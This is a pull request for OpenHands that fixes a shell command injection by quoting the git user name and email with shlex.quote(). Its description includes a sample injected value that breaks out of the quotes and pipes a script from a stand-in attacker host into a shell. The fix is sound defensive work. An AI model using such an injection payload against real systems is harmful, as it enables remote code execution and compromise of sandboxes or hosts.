### PR TITLE
fix(security): sanitize git_user_name/email in shell commands

### DIFF
--- a/openhands/app_server/app_conversation/app_conversation_service_base.py
+++ b/openhands/app_server/app_conversation/app_conversation_service_base.py
@@ -293,7 +293,7 @@ class AppConversationServiceBase(AppConversationService, ABC):
             user_info = await self.user_context.get_user_info()
 
             if user_info.git_user_name:
-                cmd = f'git config --global user.name "{user_info.git_user_name}"'
+                cmd = f'git config --global user.name {shlex.quote(user_info.git_user_name)}'
                 result = await workspace.execute_command(cmd, workspace.working_dir)
                 if result.exit_code:
                     _logger.warning(f'Git config user.name failed: {result.stderr}')
@@ -303,7 +303,7 @@ class AppConversationServiceBase(AppConversationService, ABC):
                     )
 
             if user_info.git_user_email:
-                cmd = f'git config --global user.email "{user_info.git_user_email}"'
+                cmd = f'git config --global user.email {shlex.quote(user_info.git_user_email)}'
                 result = await workspace.execute_command(cmd, workspace.working_dir)
                 if result.exit_code:
                     _logger.warning(f'Git config user.email failed: {result.stderr}')


### PR DESCRIPTION
## Summary

`_configure_git_user_settings()` in `app_conversation_service_base.py` interpolates `git_user_name` and `git_user_email` directly into shell commands with only double-quote wrapping, which is escapable:

```python
# Before
cmd = f'git config --global user.name "{user_info.git_user_name}"'
cmd = f'git config --global user.email "{user_info.git_user_email}"'
```

A crafted value like `"; curl attacker.com/shell.sh | sh #` breaks out of the double quotes and executes arbitrary commands inside the sandbox.

## Fix

Use `shlex.quote()`, which is already used for all other shell commands in the same file (L356, L357, L370, L376):

```python
# After
cmd = f'git config --global user.name {shlex.quote(user_info.git_user_name)}'
cmd = f'git config --global user.email {shlex.quote(user_info.git_user_email)}'
```

Closes OpenHands/enterprise#24